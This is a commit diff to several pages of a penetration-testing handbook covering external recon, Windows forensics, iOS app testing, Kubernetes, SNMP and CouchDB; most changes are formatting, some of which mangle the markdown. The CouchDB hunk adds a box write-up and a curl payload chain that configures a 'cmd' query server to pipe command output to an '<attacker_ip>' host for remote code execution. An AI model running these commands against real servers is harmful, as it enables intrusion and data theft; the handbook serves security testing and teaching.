GitBook: [master] 7 pages and 8 assets modified

external-recon-methodology.md

@@ -25,8 +25,8 @@ An autonomous system number \(**ASN**\) is a **unique number** assigned to an **
 An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
 
 It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.  
-****You can search by **company name**, by **IP** or by **domain** in [https://bgp.he.net/](https://bgp.he.net/).  
-Depending on the region of the company this links could be useful to gather more data: [AFRINIC](https://www.afrinic.net/) \(Africa\), [Arin](https://www.arin.net/about/welcome/region/)\(North America\), [APNIC](https://www.apnic.net/) \(Asia\), [LACNIC](https://www.lacnic.net/) \(Latin America\), [RIPE NCC](https://www.ripe.net/) \(Europe\). Anyway, probably all the **useful information** \(IP ranges and Whois\) **appears already in the first link**.
+**\*\*You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net/)**.  
+Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net/) **\(Africa\),** [**Arin**](https://www.arin.net/about/welcome/region/)**\(North America\),** [**APNIC**](https://www.apnic.net/) **\(Asia\),** [**LACNIC**](https://www.lacnic.net/) **\(Latin America\),** [**RIPE NCC**](https://www.ripe.net/) **\(Europe\). Anyway, probably all the** useful information **\(IP ranges and Whois\)** appears already in the first link\*\*.
 
 ```bash
 #You can try "automate" this with amass, but it's not very recommended
@@ -40,8 +40,8 @@ You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4
 ### Looking for vulnerabilities
 
 At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts.  
-Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) ****or use services like **shodan** to find **open ports** and depending on what you find you should **take a look in this book to how to pentest several possible service running**.  
-Also, It could be worth it to mention that you can also prepare some **default username** and **passwords** lists and try to **bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
+Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) **\*\*or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**.  
+Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce\*\* services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
 
 ## Domains
 
@@ -189,12 +189,12 @@ curl -s "https://rapiddns.io/subdomain/$1?full=1" \
 You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following:
 
 * http.html:”dev-int.bigcompanycdn.com”
-* http.html:”https://dev-int-bigcompanycdn.com”
+* http.html:”[https://dev-int-bigcompanycdn.com”](https://dev-int-bigcompanycdn.com”)
 
 ### DNS Brute force
 
 Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.  
-The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) ****and ****[**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\).
+The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\).
 
 For this action you will need some common subdomains lists like:
 
@@ -292,7 +292,7 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a
 
 Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**.
 
-To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), ****[**Aquatone**](https://github.com/michenriksen/aquatone)**,** [**shutter**](https://shutter-project.org/downloads/) ****or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
+To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), **\*\*\[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) \*\***or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
 
 ## Recapitulation 1
 
@@ -355,5 +355,3 @@ As you can see there is a lot of different vulnerabilities to search for.
 
 **If you have find any vulnerability thanks to this book, please reference the book in your write-up.**
 
-
-

forensics/basic-forensics-esp/windows-forensics/README.md

@@ -10,7 +10,7 @@ Inside this SQLite database you can find the `Notification` table with all the n
 
 Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, executed applications...  
 The database resides in the path `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`  
-This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) ****which generates 2 files that can be opened with the tool [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
+This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **\*\*which generates 2 files that can be opened with the tool \[**TimeLine Explorer\*\*\]\([https://ericzimmerman.github.io/\#!index.md](https://ericzimmerman.github.io/#!index.md)\).
 
 ## Windows RecentAPPs
 
@@ -186,7 +186,7 @@ You may be able to find them in the folder:
 ## Thumbnails
 
 When a user access a folder and organised it using thumbnails, then a `thumbs.db` file is created. This db **stores the thumbnails of the images** of the folder even if they are deleted.  
-in winXP and WIn8-8.1 this file is created automatically. In Win7/Win10, it's created automatically if it's accessed via an UNC path \(\\IP\folder\...\).
+in winXP and WIn8-8.1 this file is created automatically. In Win7/Win10, it's created automatically if it's accessed via an UNC path \(\IP\folder...\).
 
 It is possible to read this file with the tool [**Thumbsviewer**](https://thumbsviewer.github.io/).
 
@@ -419,12 +419,12 @@ The Windows Registry Contains a lot of **information** about the **system and th
 
 The files containing the registry are located in:
 
-* %windir%\System32\Config\**SAM**:  `HKEY_LOCAL_MACHINE`
-* %windir%\System32\Config\**SECURITY**:  `HKEY_LOCAL_MACHINE`
-* %windir%\System32\Config\**SYSTEM**:  `HKEY_LOCAL_MACHINE`
-* %windir%\System32\Config\**SOFTWARE**:  `HKEY_LOCAL_MACHINE`
-* %windir%\System32\Config\**DEFAULT**:  `HKEY_LOCAL_MACHINE`
-* %UserProfile%\{User}\**NTUSER.DAT**:  `HKEY_CURRENT_USER`
+* %windir%\System32\Config\*_SAM\*_:  `HKEY_LOCAL_MACHINE`
+* %windir%\System32\Config\*_SECURITY\*_:  `HKEY_LOCAL_MACHINE`
+* %windir%\System32\Config\*_SYSTEM\*_:  `HKEY_LOCAL_MACHINE`
+* %windir%\System32\Config\*_SOFTWARE\*_:  `HKEY_LOCAL_MACHINE`
+* %windir%\System32\Config\*_DEFAULT\*_:  `HKEY_LOCAL_MACHINE`
+* %UserProfile%{User}\*_NTUSER.DAT\*_:  `HKEY_CURRENT_USER`
 
 From Windows Vista and Windows 2008 Server upwards there are some backups of the `HKEY_LOCAL_MACHINE` registry files in **`%Windir%\System32\Config\RegBack\`**.  
 Also from these versions, the registry file **`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`** is created saving information about program executions.
@@ -455,5 +455,3 @@ In `SAM\Domains\Account\Users` you can obtain the username, the RID, last logon,
 
 {% page-ref page="interesting-windows-registry-keys.md" %}
 
-
-

forensics/basic-forensics-esp/windows-forensics/interesting-windows-registry-keys.md

@@ -110,7 +110,7 @@ Desktop Access:
 * `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
 * `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
 
-To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) ****and you will be able to find the **MAC time of the folder** and also the **creation date and modified date of the shellbag** which are related with the **first time the folder was accessed and the last time**.
+To analyze the Shellbags you can use [**Shellbag Explorer**](https://ericzimmerman.github.io/#!index.md) **\*\*and you will be able to find the** MAC time of the folder **and also the** creation date and modified date of the shellbag **which are related with the** first time the folder was accessed and the last time\*\*.
 
 Note 2 things from the following image:
 
@@ -131,8 +131,6 @@ Within this registry it's possible to find:
 * The Device Class ID
 * The volume name \(in the following images the volume name is the highlighted subkey\)
 
-
-
 ![](../../../.gitbook/assets/image%20%28489%29.png)
 
 ![](../../../.gitbook/assets/image%20%28479%29%20%281%29.png)
@@ -141,8 +139,6 @@ Moreover, checking the registry `HKLM\SYSTEM\ControlSet001\Enum\USB`  and compar
 
 ![](../../../.gitbook/assets/image%20%28476%29.png)
 
-
-
 With the previous information the registry `SOFTWARE\Microsoft\Windows Portable Devices\Devices` can be used to obtain the **`{GUID}`**:
 
 ![](../../../.gitbook/assets/image%20%28486%29.png)

mobile-apps-pentesting/ios-pentesting/README.md

@@ -412,8 +412,8 @@ Check for possible couchbase databases in `/private/var/mobile/Containers/Data/A
 
 iOS store the cookies of the apps in the **`Library/Cookies/cookies.binarycookies`** inside each apps folder. However, developers sometimes decide to save them in the **keychain** as the mentioned **cookie file can be accessed in backups**.
 
-To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) ****or use **objection's** `ios cookies get`.  
-You can also use objection to **convert these files to a JSON** format and inspect the data.
+To inspect the cookies file you can use [**this python script**](https://github.com/mdegrazia/Safari-Binary-Cookie-Parser) **\*\*or use** objection's **`ios cookies get`.  
+You can also use objection to** convert these files to a JSON\*\* format and inspect the data.
 
 ```bash
 ...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json
@@ -505,7 +505,7 @@ You can also use `ios keychain dump` from [**Objection**](https://github.com/sen
 #### **NSURLCredential**
 
 **NSURLCredential** is the perfect class to **store username and password in the keychain**. No need to bother with NSUserDefaults nor any keychain wrapper.  
-****Once the user is logged in, you can **store** his username and password to the keychain:
+**\*\*Once the user is logged in, you can** store\*\* his username and password to the keychain:
 
 ```swift
 NSURLCredential *credential;
@@ -731,7 +731,7 @@ For **more information** about iOS cryptographic APIs and libraries access [http
 
 The tester should be aware that **local authentication should always be enforced at a remote endpoint** or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
 
-The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) ****provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible \(and recommended\) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication.
+The [**Local Authentication framework**](https://developer.apple.com/documentation/localauthentication) _\*\*_provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible \(and recommended\) to leverage the [keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) for implementing local authentication.
 
 The **fingerprint ID** sensor is operated by the [SecureEnclave security coprocessor](https://www.blackhat.com/docs/us-16/materials/us-16-Mandt-Demystifying-The-Secure-Enclave-Processor.pdf) and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced _Face ID_: which allows authentication based on facial recognition.
 
@@ -959,7 +959,7 @@ In order to check this issue using Burp, after trusting Burp CA in the iPhone, y
 ### Certificate Pinning
 
 If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**  
-In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) ****or install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)\*\*\*\*
+In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) **\*\*or install \[**Burp Mobile Assistant_\*\]\(_[https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing\)\](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing%29\)\*\*\*
 
 You can also use **objection's** `ios sslpinning disable`
 

pentesting/5984-pentesting-couchdb.md

@@ -308,10 +308,31 @@ www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d
 {"ok":true,"id":"zero","rev":"1-967a00dff5e02add41819138abb3284d"}
 ```
 
-Request it in a view:
+Request it in a view. The db will complain about headers, but if we work with it, we can get a bit further:
 
 ```text
-www-data@canape:/dev/shm$ curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' -H "Content-Type: application/json"
+www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}'
+{"error":"bad_request","reason":"Referer header required."}
+
+www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}' -H "Referer: http://127.0.0.1:5984
+{"error":"bad_request","reason":"Referer header must match host."}
+
+www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}' -H "Referer: http://localhost:5984"
+{"error":"bad_content_type","reason":"Content-Type must be multipart/form-data"}
+
+www-data@canape:/dev/shm$ curl -X POST 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"df": {"map": ""} }, "language": "cmd"}' -H "Referer: http://localhost:5984" -H "Content-Type: multipart/form-data"
+{"error":"case_clause","reason":"undefined","ref":627893255}
+```
+
+At this point, I am stuck. An undefined “case\_clause” error wasn’t too Googleable. And this isn’t really a path for this box anyway. If you know why it’s breaking here, please let me know!
+
+#### Summary with a different payload
+
+```bash
+curl -X PUT 'http://<target_ip>:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"id | curl http://<attacker_ip>:<port> -d @-"'
+curl -X PUT 'http://<target_ip>:5984/testbed'
+curl -X PUT 'http://<target_ip>:5984/testbed/whatever' -d '{"_id":"770855a97726d5666d70a22173005c77"}'
+curl -X PUT http://<target_ip>:5984/testbed/_design/whatever -d '{"_id":"_design/test","views":{"anything":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
 ```
 
 ## Shodan

pentesting/pentesting-kubernetes/enumeration-from-a-pod.md

@@ -71,8 +71,6 @@ GET /apis/apps/v1/watch/deployments  [DEPRECATED]
 
 They open a streaming connection that returns you the full manifest of a Deployment whenever it changes \(or when a new one is created\).
 
-
-
 {% hint style="danger" %}
 The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
 {% endhint %}
@@ -348,5 +346,5 @@ nmap-kube-discover
 
 ## References
 
-{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}
+{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" caption="" %}
 

pentesting/pentesting-snmp/README.md

@@ -90,6 +90,7 @@ To **guess the community string** you could perform a dictionary attack. Check [
 ## Enumerating SNMP
 
 It is recommanded to install the following to see whats does mean **each OID gathered** from the device:
+
 ```bash
 apt-get install snmp-mibs-downloader
 download-mibs
@@ -104,13 +105,13 @@ snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
 nmap --script "snmp* and not snmp-brute" <target>
 ```
 
-Thanks to extended queries (download-mibs), it is possible to enumerate even more about the system with the following command : 
+Thanks to extended queries \(download-mibs\), it is possible to enumerate even more about the system with the following command :
 
 ```bash
 snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
 ```
 
-**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** (IPv4 and **IPv6** address), Usernames, Uptime, Server/OS version, and **processes running** (may contain passwords)....
+**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** \(IPv4 and **IPv6** address\), Usernames, Uptime, Server/OS version, and **processes running** \(may contain passwords\)....
 
 ## From SNMP to RCE
 
@@ -178,6 +179,3 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can
 * snmpd.conf
 * snmp-config.xml
 
-  
-
-